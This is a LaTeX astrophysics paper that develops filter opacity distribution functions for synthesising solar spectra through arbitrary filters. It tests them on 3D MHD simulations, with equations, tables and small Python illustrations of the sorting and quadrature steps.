The advent of powerful computers has made it possible to gradually replace 1D modelling with 3D hydrodynamic and magnetohydrodynamic (HD and MHD, respectively) simulations of the near-surface layers of the Sun and stars. Such simulations have reached a high level of realism \citep[see, e.g.,][]{1998ApJ...499..914S,2005A&A...429..335V,2017ApJ...834...10R,2011A&A...531A.154G,2012JCoPh.231..919F} and have been extensively tested against various solar observations. Using these simulations, the emergent spectra can then be calculated in the 1.5D regime, i.e., along many parallel rays passing through a 3D model. The resulting intensity along any particular direction is then calculated by combining the intensities along all the rays which together sample the whole simulation cube \citep[see][for detailed descriptions of the approach]{2012A&A...547A..46H, 2013A&A...558A..20H, rietmueller-solanki-2014, norris-beck-2017}.
One of the main hurdles in calculating spectra emerging from stellar atmospheres is the intricate wavelength dependence of the opacity brought about by millions of atomic and molecular lines. These lines dominate opacity in the ultra-violet (UV) and significantly contribute to the opacity in the visible spectral domain for cool stars like the Sun. Consequently, even though many applications require computations of the spectra with intermediate spectral resolutions (e.g., 10 {\rm {\AA}} or coarser) the spectrum must still be calculated on a grid with a very fine spectral resolution to catch all the relevant spectral features (since missing them would also affect the spectrum averaged to a coarse resolution). Such calculations on a fine spectral grid are computationally expensive, especially in the case of 1.5D calculations when spectra must be synthesised, sometimes along millions of rays.
One way to drastically reduce the computational time is to use Opacity Distribution Functions (ODFs) introduced by \citet[][]{1951ZA.....29..199L} \citep[see also][for detailed discussions on ODFs]{2014tsa..book.....H}. The ODFs method is based on a clever way of describing the opacity that significantly reduces the number of frequencies on which the radiative transfer (RT) equation is solved. In other words, the detailed frequency dependence of the opacity is replaced by a few points, which are representative of the entire opacity distribution.
ODFs have been extensively used and tested for 1D models of the solar atmosphere \citep[see e.g.,][]{1974ApJ...188L..21K,1979ApJS...40....1K, 2019A&A...627A.157C}.
Present computing resources allow direct (i.e., on a fine spectral grid) calculations of spectra with 1D models so that the ODFs method is rarely used in 1D modelling. At the same time direct calculations of emergent spectra are still not feasible over a broad spectral range for the 1.5D computations based on the output of 3D (M)HD simulations. Therefore, the transition from 1D to 3D (M)HD modelling of stellar atmospheres has rekindled the interest in the ODFs method.
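As a toy illustration of the idea (with made-up opacity samples; real implementations also tabulate the ODFs over temperature and pressure): within one spectral bin, the rapidly varying opacity is sorted into a monotonic distribution and then represented by a few sub-bin averages, so that the radiative transfer needs to be solved only at those few representative opacities.

```python
def build_odf(opacities, n_sub):
    """Toy opacity distribution function for one spectral bin: sort the
    opacity samples and replace them by n_sub equal-size sub-bin means."""
    srt = sorted(opacities)
    size = len(srt) // n_sub  # assume len(opacities) is divisible by n_sub
    return [sum(srt[i * size:(i + 1) * size]) / size for i in range(n_sub)]

kappa = [5.0, 1.0, 40.0, 2.0, 8.0, 3.0, 1.5, 20.0]  # made-up line+continuum opacities
print(build_odf(kappa, 4))  # [1.25, 2.5, 6.5, 30.0]
```

The mean opacity of the bin is preserved, while the number of radiative-transfer frequencies drops from the number of opacity samples to n_sub.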
There are, however, two shortcomings of the ODFs method which have to be addressed to make it a reliable tool for comprehensive modelling of stellar spectra. First, the applicability of the ODFs method for synthesising emerging spectra from 3D (M)HD cubes has never been tested. Second, the ODFs method allows calculating radiative intensity integrated in various spectral domains, which can be considered as spectral intensity passing through a filter with a transmission function that has a rectangular dependence on the wavelength (i.e., zero outside of the given spectral pass-band and a constant value within this pass-band). However, it does not allow calculating intensity passing through filters with non-rectangular dependence of the transmission function on the wavelength. At the same time, such calculations are needed, for example, to analyse solar observations in narrow band filters \citep[e.g., performed by the Sunrise balloon borne observatory, see][]{2010ApJ...723L.127S},
to model stellar colours \citep[which are measured in different narrow and broadband filters, see, e.g.,][for a comprehensive list]{Sun_in_filters}, to calculate limb darkening coefficients in the pass-band of planetary hunting telescopes (e.g., {\it Kepler}, TESS, and CHEOPS) as well as to model the impact of magnetic activity on stellar brightness measured by various ground- and space-based filter equipped telescopes. For such calculations the spectral pass-band has to be split in many small intervals where the spectral dependence of the transmission function can be neglected.
The large number of intervals, however, increases the number of frequencies at which spectral synthesis must be performed and, thus, reduces the performance of the ODFs method.
In this study we eliminate both shortcomings. Firstly, we generalise the ODFs method for calculating intensities passing through filters with arbitrary transmission functions and present the filter-ODFs (hereafter, FODFs) method. For this purpose we limit ourselves to filters that are narrow enough that neither continuum opacity nor Planck function changes noticeably within the filter. Secondly we test the performance of the ODFs and FODFs methods on the exemplary case of solar 3D MHD simulations with the MURaM code \citep[Max Planck Institute/University of Chicago Radiative MHD, see][]{2005A&A...429..335V}. For the RT calculations we use the newly developed {\bf{M}}erged {\bf{P}}arallelised {\bf{S}}implified (MPS) - ATLAS code \citep{2020A&A_Witzke}. A preliminary study of the filter-ODFs method was performed by \citet[][]{2019A&A...627A.157C}, who demonstrated that the method is capable of accurately returning intensity in the Str\"{o}mgren {\it b} filter in the case of 1D semi-empirical models of the solar atmosphere \citep[FALC and FALP by][]{1993ApJ...406..319F}. Here we present a more detailed study based on 3D MHD simulations.
The paper is organized as follows. Section~\ref{method} gives a general overview of the ODFs method and presents the FODFs method, Section~\ref{results} presents the main
results of the paper, and Section~\ref{conclusions} summarises the conclusions where we discuss the applications and limitations of the ODFs/FODFs method.
\section{Methods}
\label{method}
\subsection{The (Filter) Opacity Distribution Functions}
\label{fodfs-method}
In this section we first recall the traditional ODFs method used for calculating radiative intensity passing through rectangular filters. Then we introduce the formalism of the FODFs method that we developed for calculating radiative intensities passing through an arbitrary filter.
Let us consider a wavelength interval $ [\lambda_1,\lambda_2] $ over which we would like to compute the total spectral intensity:
\begin{equation}
\label{eq:f}
f=\int_{\lambda_{1}}^{\lambda_{2}} I(\lambda) d\lambda.
\end{equation}
The most straightforward way of computing the integral in Equation~(\ref{eq:f}) is to calculate the emergent intensity on a fine grid of spectral points within the $ [\lambda_1,\lambda_2] $ interval (hereafter, spectral bin) and approximate $f$ by the quadrature $f_{\rm HR}$ (where ``HR'' stands for high resolution since the quadrature must be calculated on the high-resolution wavelength grid):
\begin{equation}
\label{eq:f_quadr}
f \approx f_{\rm HR} \equiv \sum\limits_{i=1}^{N} I(\lambda_i) \cdot \Delta \lambda,
\end{equation}
where $N$ is the number of points in a high resolution grid, which we assume to be equidistant, and $\Delta \lambda = (\lambda_2-\lambda_1) / (N-1)$ is one step on the grid.
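As an illustration, the quadrature of Equation~(\ref{eq:f_quadr}) can be sketched in a few lines of Python; the intensity profile below is a synthetic stand-in (one Gaussian absorption line on a flat continuum), not an actual spectral synthesis.

```python
import numpy as np

# Sketch of the quadrature f_HR: approximate the integral of I(lambda)
# over [lam1, lam2] by summing I on an equidistant high-resolution grid.
def f_hr(intensity, lam1, lam2, n):
    lam = np.linspace(lam1, lam2, n)     # N grid points
    dlam = (lam2 - lam1) / (n - 1)       # grid step
    return np.sum(intensity(lam)) * dlam

# Synthetic stand-in: unit continuum with one Gaussian absorption line.
def intensity(lam):
    return 1.0 - 0.8 * np.exp(-0.5 * ((lam - 500.0) / 0.05) ** 2)

approx = f_hr(intensity, 494.6, 503.4, 100001)
# Analytic reference: 8.8 minus the Gaussian line area 0.8 * 0.05 * sqrt(2*pi)
```

For a realistic $I(\lambda)$ with the line richness of Figure~\ref{figure1}, $N$ must be very large, which is exactly the cost the ODFs method is designed to avoid.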
Equation~(\ref{eq:f_quadr}) implies that, firstly, the opacities in a 1D atmosphere (or along a ray following the 1.5D approach) must be calculated at $N$ frequency points and, secondly, the formal solution of the RT equation must be performed $N$ times. A great simplification can be achieved by employing the local thermodynamic equilibrium (LTE) approximation. Then the opacity at a given frequency only depends on the elemental composition, pressure, temperature, and turbulent velocity.
We note that here we approximate the detailed velocity profile by a scalar generally known as the micro-turbulence parameter which broadens the lines and enters opacity. Such an approximation does not allow one to accurately synthesise profiles of individual spectral lines but it is routinely applied for calculating intensities in various pass-bands \citep[see, e.g.,][]{norris-beck-2017, Yelles2020}.
Consequently, for a given elemental composition the opacity can be pre-tabulated and then interpolated for all the points in the stellar atmosphere. This avoids direct calculations of the opacity values on the fly and dramatically reduces the computational cost.
Nevertheless, calculations with the quadrature method, especially over a broad frequency interval, can be very time-consuming. The main problem is that $N$ often must be a very large number to find a reasonable approximation of the integral $f$, so that one has to solve the RT equation many times. We illustrate this point in Figure~\ref{figure1} whose top panels show high-resolution opacity calculated with the MPS-ATLAS code (see below) under the condition of LTE for the temperature 4250 K and pressure 3.3$\times 10^4$ dyn/cm$^2$ (values close to those encountered in the upper solar photosphere). One can see that
the opacity is fully dominated by the Fraunhofer lines in the UV spectral domain (left top panel of Figure~\ref{figure1}) and is strongly affected by lines in the visible (right top panel of Figure~\ref{figure1}). As a result the opacity has a highly complex spectral profile and can vary over many orders of magnitude within a very narrow spectral interval. The emergent spectra are plotted in the bottom panels of Figure~\ref{figure1}. They are calculated for one of the rays passing through the MHD cube representing the solar atmosphere (see below for more details). One can see that just like the opacity the spectra have a very rich structure. In particular, the numerous absorption lines in the UV overlap and blend with each other so strongly that it even becomes impossible to identify the continuum level. All in all, Figure~\ref{figure1} illustrates that one needs a very fine frequency grid (i.e., up to a thousand points) to capture all the spectral details shown in the top and bottom panels of Figure~\ref{figure1} and thus to accurately calculate the integrated intensity in the shown spectral domains.
An alternative and much more time-efficient approach than the direct calculation of the quadrature $f_{\rm HR}$ is the ODFs method. This method sorts the frequency points in the high-resolution grid according to the value of opacity at some depth point in the atmosphere, i.e., it constructs a transformation $i \rightarrow M (i)$, which implies that the $i$-th grid point (with $1 \le i \le N$) is replaced with the $M(i)$-th point (with $1 \le M(i) \le N$). The main assumption of the ODFs method is that the transformation $M$ is the same for all depth points in the atmosphere contributing to the intensity in the bin $ [\lambda_1,\lambda_2] $. Under such an assumption Equation~(\ref{eq:f_quadr}) can be rewritten as
\begin{equation}
\label{eq:f_quadr_sort}
f_{\rm HR} = \sum\limits_{i=1}^{N} I(\lambda_{M(i)}) \cdot \Delta \lambda.
\end{equation}
There is a crucial difference between Equation~(\ref{eq:f_quadr}) and Equation~(\ref{eq:f_quadr_sort}) introduced by reordering terms in the summation.
Indeed, in Equation~(\ref{eq:f_quadr}) the term with index $i$ and those with indices close to $i$ can correspond to very different values of opacity and, consequently, be very different.
In contrast, in Equation~(\ref{eq:f_quadr_sort}) nearby terms, e.g., those with indices $M(i-1)$, $M(i)$, and $M(i+1)$,
should have similar values of opacity at all depth points (according to the ODFs assumption) and, consequently, similar emergent intensities.
Let us then rewrite Equation~(\ref{eq:f_quadr_sort}) splitting the entire sum into $s$ sub-sums with the $j$-th sub-sum containing $N_j$ grid points:
\begin{equation}
\label{eq:f_group}
f_{\rm HR} = \left ( \sum\limits_{i=1}^{N_1} I(\lambda_{M(i)}) +
\sum\limits_{i=N_1+1}^{N_1+N_2} I(\lambda_{M(i)}) +
\sum\limits_{i=N_1+N_2+1}^{N_1+N_2+N_3} I(\lambda_{M(i)}) +...+
\sum\limits_{i=N-N_s+1}^{N} I(\lambda_{M(i)}) \right ) \cdot \Delta \lambda .
\end{equation}
The opacity and intensity values for all points within individual sub-sums are close to each other. Thus, one can now substitute the intensity values in the sub-sums by the intensity calculated using opacity averaged over all the frequency points in the sub-sum, i.e.,
\begin{equation}
\label{eq:subbin}
f_{\rm HR} \approx f_{\rm ODFs} \equiv \sum\limits_{j=1}^{s} \widehat{I_j} \, \widehat{\Delta \lambda_j},
\end{equation}
where $\widehat{I_j}$ is calculated by solving the RT equation with opacity averaged (e.g., arithmetically or geometrically, see Section~\ref{results}) over the grid points within the sub-sum, and $\widehat{\Delta \lambda_j} = N_j \cdot \Delta \lambda$. The $s$ intervals are called sub-bins and the mean opacity in each of the sub-bins is called the ODF. Exactly like the high-resolution opacity values, the ODFs for a given chemical composition can be pre-tabulated as a function of temperature, pressure, and micro-turbulent velocity. Here $\widehat{I_j}$ is formulated to represent an Intensity Distribution Function associated with the ODF.
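A minimal Python sketch of this construction (sort the high-resolution opacities, split the sorted sequence into sub-bins of prescribed relative sizes, and average within each) might look as follows; the opacity array is synthetic, and the cumulative sub-bin sizes are taken from the Kurucz set-up discussed in Section~\ref{results}.

```python
import numpy as np

def build_odf(kappa_hr, cum_sizes, mean="geometric"):
    """One mean opacity per sub-bin from sorted high-resolution opacities.

    cum_sizes: cumulative relative sub-bin sizes s_j in (0, 1].
    """
    kappa_sorted = np.sort(kappa_hr)               # the i -> M(i) reordering
    n = len(kappa_sorted)
    edges = [0] + [int(round(s * n)) for s in cum_sizes]
    odf = []
    for lo, hi in zip(edges[:-1], edges[1:]):
        chunk = kappa_sorted[lo:hi]
        if mean == "geometric":
            odf.append(np.exp(np.mean(np.log(chunk))))
        else:                                      # arithmetic mean
            odf.append(np.mean(chunk))
    return np.array(odf)

rng = np.random.default_rng(1)
kappa = 10.0 ** rng.uniform(-2.0, 4.0, size=1200)  # 6 dex of synthetic opacity
kurucz = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 0.95, 0.9833, 1.0]
odf = build_odf(kappa, kurucz)
```

Because the chunks are consecutive slices of a sorted array, the resulting ODF is a monotonically non-decreasing, step-wise representation of the opacity distribution.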
The first step towards moving from the ODFs to FODFs is a generalisation of Equations~(\ref{eq:f_group}--\ref{eq:subbin}) to a non-equidistant high-resolution spectral grid. Equation~(\ref{eq:f_group}) then becomes:
\begin{equation}
\label{eq:f_group_non}
f_{\rm HR} = \sum\limits_{i=1}^{N_1} I_{M(i)} \Delta \lambda_{M(i)}
+
\sum\limits_{i=N_1+1}^{N_1+N_2} I_{M(i)} \Delta \lambda_{M(i)} +
\sum\limits_{i=N_1+N_2+1}^{N_1+N_2+N_3} I_{M(i)} \Delta \lambda_{M(i)} +...+
\sum\limits_{i=N-N_s+1}^{N} I_{M(i)} \Delta \lambda_{M(i)} ,
\end{equation} where for simplicity we introduce a designation $I_{M(i)} \equiv I(\lambda_{M(i)}) $.
Each sub-sum in Equation~(\ref{eq:f_group_non}) can be written as $\bar{I}_j \times l_j$, a product of weighted mean of intensity (with weights being proportional to the steps of the wavelength grid) $\bar{I}_j=\sum I_{M(i)} \left ( \Delta \lambda_{M(i)} / l_j \right )$, and the width of the sub-bin $l_j = \sum \Delta \lambda_{M(i)}$. Here we also define the size of the $j$-th sub-bin as
\begin{equation}
\label{sub-bin-sizes}
s_j=l_j/(\lambda_2-\lambda_1).
\end{equation}
Then, exactly like in Equation~(\ref{eq:subbin}) the weighted mean of intensity $\bar{I}_j$ can be approximated by the intensity calculated with the weighted mean of opacity denoted as $\widehat{I}_j$. Most importantly, the utilised weights only depend on the high-resolution frequency grid, so that the weighted mean opacity in each of the sub-bins can be pre-calculated and pre-tabulated, and we now call them FODFs. Similar to the case of ODFs, here $\widehat{I_j}$ is formulated to represent an Intensity Distribution Function associated with the FODF. Hereafter for convenience these Intensity Distribution Functions are simply referred to as intensities computed using ODFs or FODFs.
All in all, the ODFs method implies approximation of the mean intensity in the sub-bin by intensity calculated with the mean opacity in the sub-bin. The accuracy of such an approximation strongly depends on the choice of the splitting in Equation~(\ref{eq:f_group}), which is a crucial aspect of the ODFs method. A proper choice implies that the intensity in the sub-bin should depend on the opacity in a roughly linear way. In particular, one should avoid situations when intensity strongly depends on the opacity in some part of the sub-bin but then saturates in another. As a result, the relative sizes of the sub-bins (defined in Equation~(\ref{sub-bin-sizes})) with large opacity values are usually chosen to be smaller than those with small opacity values. A detailed study of the optimal choice of the sub-bins was recently performed by \cite{2019A&A...627A.157C}.
Let us now consider the case when instead of calculating the total spectral intensity in the bin (or in other words, intensity passing through the rectangular filter) one needs to calculate intensity passing through
a filter with some wavelength-dependent transmission $\phi=\phi(\lambda)$ (with $0 \le \phi \le 1$ ):
\begin{equation}
\label{eq:F}
F=\int_{\lambda_{1}}^{\lambda_{2}} I(\lambda) \, \phi(\lambda) \, d\lambda.
\end{equation}
Similar to Equation~(\ref{eq:f_quadr}), the integral can be approximated by the quadrature:
\begin{equation}
\label{eq:F_quadr}
F \approx F_{\rm HR} \equiv \sum\limits_{i=1}^{N} I(\lambda_i) \, \phi(\lambda_i) \cdot \Delta \lambda.
\end{equation}
The most direct way of employing the ODFs method for calculating $F_{\rm HR}$ is to move the filter transmission function out of the summation in Equation~(\ref{eq:F_quadr}) and write the intensity as a product of the mean transmission value and intensity in the rectangular filter (which can then be approximated by $f_{\rm ODFs}$):
\begin{equation}
\label{eq:F_ODF}
F_{\rm HR} \approx F_{\rm ODFs} \equiv \left (\frac{1}{N} \sum\limits_{i=1}^{N} \phi(\lambda_i) \right ) \cdot f_{\rm ODFs},
\end{equation}
where $f_{\rm ODFs}$ is given by Equation~(\ref{eq:subbin}). An obvious advantage of such an approach is that it does not require any recalculations of ODFs, so that the same ODFs can be used for all filters. It is, however, clear that $F_{\rm ODFs}$ cannot be an accurate approximation of $F_{\rm HR} $ since it does not account for the distribution of spectral features within the filter.
A much more accurate way is to sort and split the terms in Equation~(\ref{eq:F_quadr}) exactly as done in Equations~(\ref{eq:f_group}) and (\ref{eq:f_group_non}). Then, in each of the sub-bins one can approximate the mean values of intensity weighted with the transmission function by intensity calculated with the corresponding weighted mean of opacity. The only disadvantage of such an approach is that the transmission function is bound to affect the optimal choice of the sub-binning, i.e., grouping of terms in Equations~(\ref{eq:f_group}) and (\ref{eq:f_group_non}). For example, it might happen that the largest opacity coincidentally corresponds to small values of the transmission function (i.e., a strong spectral line is located in the wings of the filter). Then it does not make sense to approximate the peak of the opacity distribution (i.e., highest values of the opacity) as accurately as one would do it in the case of the rectangular transmission function.
A simple way to overcome this problem is to transform a high-resolution
wavelength grid $\lambda_i$:
\begin{equation}
\label{eq:tilda}
\tilde{\lambda}_i=\Delta \lambda \, \sum\limits_{j=1}^{i} \phi(\lambda_j), \,\,\,\,\,\, \Delta \tilde{\lambda}_i = \Delta \lambda \, \phi(\lambda_i),
\end{equation}
where the transformation is for simplicity written for the case of an equidistant $\lambda_i$ grid.
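In code, the transform of Equation~(\ref{eq:tilda}) is just a cumulative sum of the filter-weighted grid steps; the triangular transmission profile below is an illustrative assumption, not one of the filters used later in the paper.

```python
import numpy as np

def transform_grid(lam, phi_vals):
    """tilde-lambda_i and its steps for an equidistant lambda grid."""
    dlam = lam[1] - lam[0]
    dlam_tilde = dlam * phi_vals         # new, non-equidistant steps
    lam_tilde = np.cumsum(dlam_tilde)    # new wavelength coordinates
    return lam_tilde, dlam_tilde

lam = np.linspace(494.6, 503.4, 2001)
phi_vals = np.clip(1.0 - np.abs(lam - 499.0) / 4.4, 0.0, 1.0)  # toy triangle
lam_tilde, dlam_tilde = transform_grid(lam, phi_vals)
# The total tilde width equals the equivalent width of the filter,
# here the area of the triangle, 4.4 nm.
```

Spectral regions where $\phi$ is small occupy correspondingly little room on the new grid, so a strong line in the filter wing is automatically down-weighted.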
Then Equation~(\ref{eq:F_quadr}) can be rewritten as
\begin{equation}
\label{eq:F_quadr_tilde}
F_{\rm HR} = \sum\limits_{i=1}^{N} I_i \, \Delta \tilde{\lambda}_i.
\end{equation}
Equation~(\ref{eq:F_quadr_tilde}) represents a quadrature on a non-equidistant grid, which can be adequately approximated by an ODFs sum similar to that in Equation~(\ref{eq:subbin}), but
written on the new $\tilde{\lambda}$ wavelength grid:
\begin{equation}
F_{\rm FODFs} \equiv \sum\limits_{j=1}^{s} \widehat{I_j} \,\widehat{ \Delta \tilde{\lambda_j}},
\end{equation}
where $F_{\rm FODFs}$ stands for the intensity calculated with filter-ODFs (which are essentially normal ODFs, but calculated on the new wavelength grid $\tilde{\lambda}$), and $\widehat{I_j}$ is the intensity computed with the opacity averaged over the sub-bin of width $\widehat{ \Delta \tilde{\lambda_j}}$.
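The whole chain can be exercised on a toy problem. The sketch below, with entirely synthetic line opacities and filter, replaces the formal RT solution by the monotone mapping $I = 1/(1+\kappa)$ (our assumption, chosen only so that the intensity of a mean opacity approximates the mean intensity) and compares $F_{\rm HR}$, the naive $F_{\rm ODFs}$ of Equation~(\ref{eq:F_ODF}), and $F_{\rm FODFs}$.

```python
import numpy as np

rng = np.random.default_rng(7)
n = 12000
lam = np.linspace(294.6, 303.4, n)
dlam = lam[1] - lam[0]

# Synthetic opacity: 80 overlapping Gaussian lines of random strength.
kappa = np.zeros(n)
for c, s in zip(rng.uniform(294.6, 303.4, 80), 10.0 ** rng.uniform(-1, 2, 80)):
    kappa += s * np.exp(-0.5 * ((lam - c) / 0.02) ** 2)

phi = np.clip(1.0 - np.abs(lam - 299.0) / 4.4, 0.0, 1.0)  # toy filter profile
toy_I = lambda k: 1.0 / (1.0 + k)   # monotone stand-in for the RT solution

# Cumulative relative sub-bin sizes (the Kurucz set-up).
sizes = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 0.95, 0.9833, 1.0]

def odf_sum(kap, weights, sizes):
    """Sum over sub-bins of I(weighted-mean opacity) * sub-bin weight."""
    order = np.argsort(kap)
    k, w = kap[order], weights[order]
    targets = np.asarray(sizes) * w.sum()
    edges = np.concatenate(([0], np.searchsorted(np.cumsum(w), targets) + 1))
    edges[-1] = len(k)
    total = 0.0
    for lo, hi in zip(edges[:-1], edges[1:]):
        wsub = w[lo:hi].sum()
        if wsub > 0.0:
            total += toy_I(np.sum(k[lo:hi] * w[lo:hi]) / wsub) * wsub
    return total

F_hr = np.sum(toy_I(kappa) * phi) * dlam            # high-resolution reference
f_odfs = odf_sum(kappa, np.full(n, dlam), sizes)    # rectangular-filter ODFs
F_odfs = np.mean(phi) * f_odfs                      # naive estimate
F_fodfs = odf_sum(kappa, dlam * phi, sizes)         # FODFs on the tilde grid
```

On such toy set-ups the FODFs estimate typically lands within a few per cent of the high-resolution reference, for the reasons discussed above.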
The most important benefit of transforming the
wavelength grid is that the sizes of the sub-bins ($s_j$ defined in Equation~(\ref{sub-bin-sizes})) can be taken to be the same as for the rectangular filter, e.g., one can directly use the recipes proposed by \cite{2019A&A...627A.157C}. Furthermore, FODFs can be pre-calculated and tabulated for any given filter profile as a function of temperature, pressure, and micro-turbulent velocity exactly the same way the traditional ODFs are pre-tabulated.
We note here that dividing a given bin into sub-bins with equal or unequal widths is respectively termed uniform or non-uniform sub-binning.
For example, in the earlier formulations Kurucz used twelve non-uniform sub-bins per bin, such that the sub-bins containing the largest values of the opacity are closely spaced \citep[see, e.g.,][]{1991ASIC..341..441K,Castelli_2005_DFSYNTHE}. Hereafter we refer to this particular sub-binning, suggested by Kurucz, as the Kurucz sub-binning (see also Table~\ref{tab:table2} and discussions in Section~\ref{results}).
The Kurucz sub-binning set-up of twelve non-uniform sub-bins per bin is used for most of our tests.
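Taking differences of the cumulative Kurucz sizes (Table~\ref{tab:table2}, row ``nonuni-12'') makes the non-uniformity explicit: the last sub-bin, which holds the largest opacities, is six times narrower than the first.

```python
import numpy as np

# Cumulative relative sizes s_j of the Kurucz sub-binning ("nonuni-12").
kurucz = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 0.95, 0.9833, 1.0]
widths = np.diff([0.0] + kurucz)   # individual sub-bin widths
# widths: nine of 0.1, then 0.05, 0.0333, 0.0167 -- finest where opacity is largest
```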
We stress here that the ODFs method is based on the assumption that transformation $i \rightarrow M (i)$ (see Equation~(\ref{eq:f_quadr_sort})) does not change within the region where radiation in a given bin forms. In other words, we assume that there is a unique correspondence between a given point in a sub-bin and the actual wavelength for all depths within the formation region. For instance, the wavelength of the point of maximum opacity in the given bin is the same at all depths.
The accuracy of the ODFs method diminishes if this assumption is not fulfilled, e.g., when the maximum value of the opacity corresponds to a certain wavelength at some depths, but to another wavelength elsewhere. In Section~\ref{results} we compare the intensities computed using the ODFs method with those computed using the high-resolution opacities and, thus, test the ODFs assumption.
\begin{table}[h!]
\begin{center}
\caption{Mean errors of $e_{\textrm {ODFs}}$ plotted in Figures~\ref{figure2} and \ref{figure3}.}
\label{tab:table1}
\begin{tabular}{l|c|c|c}
 & \textbf{ODF-1 bin} & \textbf{ODF-5 bin} & \textbf{ODF-20 bin} \\
\hline
\hline
UV, GM & -1.22 \% & -1.07 \% & -1.14 \% \\
UV, AM & -0.68 \% & -0.53 \% & -0.65 \% \\
\hline
Visible, GM & -0.18 \% & -0.19 \% & --- \\
Visible, AM & 0.19 \% & 0.14 \% & --- \\
\hline
\hline
\end{tabular}
\end{center}
\end{table}
\begin{table}[h!]
\begin{center}
\caption{Sub-bin sizes $s_j$ (defined in Equation~(\ref{sub-bin-sizes})) used for the plots in Figure~\ref{figure4}.}
\label{tab:table2}
\begin{tabular}{l|c}
\textbf{Figure legend} & \textbf{Sub-bin sizes $s_j$} \\
\hline
\hline
nonuni-12 & \{0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 0.95, 0.9833, 1.0\} \\
uni-12 & \{0.083, 0.167, 0.25, 0.333, 0.417, 0.5, 0.583, 0.667, 0.75, 0.833, 0.917, 1.0\}\\
uni-8 & \{0.125, 0.25, 0.375, 0.5, 0.625, 0.75, 0.875, 1.0\}\\
uni-4 & \{0.25, 0.5, 0.75, 1.0\}\\
nonuni-4a & \{0.32, 0.6, 0.8, 1.0\} \\
nonuni-4b & \{0.80, 0.92, 0.96, 1.0\}\\
nonuni-4c & \{0.76, 0.88, 0.94, 1.0\}\\
\hline
\hline
\end{tabular}
\end{center}
\end{table}
\begin{figure}
\includegraphics[scale=0.4]{f01.eps}
\includegraphics[scale=0.4]{f02.eps}
\caption{Top panels show high resolution opacities (black lines) in the UV and the visible pass-band over-plotted
with the continuum opacity (red lines) at a given depth point in the line formation region.
Bottom panels show high resolution emergent spectra (black lines). Also over-plotted are
the SuFI and SuFIV filter profiles (blue lines) in the respective spectral pass-bands.
}
\label{figure1}
\end{figure}
\subsection{Numerical setup}
\label{1.5D-RT}
The 3D atmospheric structures utilised for tests in this paper were computed using the radiative MHD code MURaM \citep[][] {2005A&A...429..335V}. The MURaM code was designed for realistic simulations of the stellar upper convection zones and photospheric layers. To this end, the non-ideal MHD equations are numerically solved in a local Cartesian box.
The code includes a non-grey treatment of the energy exchange between matter and radiation, namely the RT is solved independently in four opacity bins \citep[see][for a detailed description]{2005A&A...429..335V}.
In this paper we used the 3D MHD atmospheric structures of \citet[][]{2020ApJ...894..140R} who used the same simulation set-up as in \citet[][]{Rempel2014}.
These simulations use a vertical or symmetric lower boundary and a variety of initial magnetic field conditions to enable small-scale dynamo action and obtain various levels of magnetization \citep[see e.g.,][]{2020ApJ...894..140R}. For our studies we chose the case with an initial 300 G vertical magnetic field, which corresponds to the most magnetized cube; it covers a broader variety of structures and, thus, provides a better testbed for ODFs and FODFs.
The MHD cubes that we used for our study cover only $1$ Mm above the photosphere.
Although the formation heights of most of the lines lie within the cube, it does not extend high enough to cover the formation region of some of the UV lines in the spectral region of our interest (see discussion at the end of this section).
Such a poor sampling of the formation region will affect the high-resolution and (F)ODFs calculations differently, thus leading to deviations between them that are not introduced by the (F)ODFs approximation.
Therefore, to make sure that our cubes are sufficiently high we extrapolate them upward. We add twenty extra height points above the top surface of the simulation box. At these points, we keep the temperature fixed (to the value at the topmost grid point of the cube before extrapolation) and assign a monotonically outward-decreasing column mass and pressure.
This ad-hoc extrapolation is justifiable since the goal of this paper is not to make realistic calculations but rather to test the (F)ODFs method by comparing it with high-resolution computations on the same atmosphere. This extrapolation is used for all the UV results presented in this paper.
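A hedged sketch of such an upward extension is given below; the exponential pressure decrease with a fixed scale height is our illustrative assumption, since the text only requires the added column mass and pressure to decrease monotonically outward.

```python
import numpy as np

def extend_column(z_cm, temp, pres, n_extra=20, scale_height_cm=1.2e7):
    """Append n_extra height points: temperature clamped to the topmost value,
    pressure decreasing monotonically outward (exponential law assumed here)."""
    dz = z_cm[-1] - z_cm[-2]
    z_new = z_cm[-1] + dz * np.arange(1, n_extra + 1)
    t_new = np.full(n_extra, temp[-1])          # isothermal extension
    p_new = pres[-1] * np.exp(-(z_new - z_cm[-1]) / scale_height_cm)
    return (np.concatenate([z_cm, z_new]),
            np.concatenate([temp, t_new]),
            np.concatenate([pres, p_new]))

# Toy column: 1 Mm of height in cm, with a smooth made-up stratification.
z = np.linspace(0.0, 1.0e8, 101)
T = np.linspace(6500.0, 4400.0, 101)
P = 1.0e5 * np.exp(-z / 2.0e7)
z2, T2, P2 = extend_column(z, T, P)
```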
We follow the 1.5D approach for calculating the emergent spectrum, i.e., we treat the 1D rays piercing the 3D MHD cube as independent 1D atmospheres. For the vertical rays the temperature, density, pressure and velocity are taken directly from the MURaM grid points, while for the inclined rays these quantities are interpolated.
To solve the RT equation along the ray and to synthesise ODFs and FODFs we employ the newly developed MPS-ATLAS code \citep{2020A&A_Witzke}, which combines an LTE RT solver, with a tool to calculate and pre-tabulate line opacity as well as to create ODFs and FODFs out of them. The MPS-ATLAS builds on the ATLAS9 \citep{Kurucz_manual_1970,Kurucz_2005_Atlas12_9,Castelli_ATLAS12_2005} and the DFSYNTHE \citep{Castelli_2005_DFSYNTHE} codes. For the line opacity the standard Kurucz linelist\footnote{http://kurucz.harvard.edu/linelists/linescd/} is used, and line profiles are described by the Voigt function, except for hydrogen lines which are treated using Stark profiles \citep{SYNTHE_2002_Cowley}.
For solving the RT equation MPS-ATLAS first calculates the equilibrium number densities in LTE for a large set of elements and molecules. In the next step the continuous opacity is computed, which includes all relevant opacity sources, i.e., free-free and bound-free atomic and molecular transitions, as well as electron scattering and Rayleigh scattering. Subsequently, the line opacity from the pre-tabulated opacity table is read, interpolated, and added. Finally, the RT equation is solved using a Feautrier method. This is repeated for every frequency point at which the emergent intensity is needed. For more details see \citet{2020A&A_Witzke}.
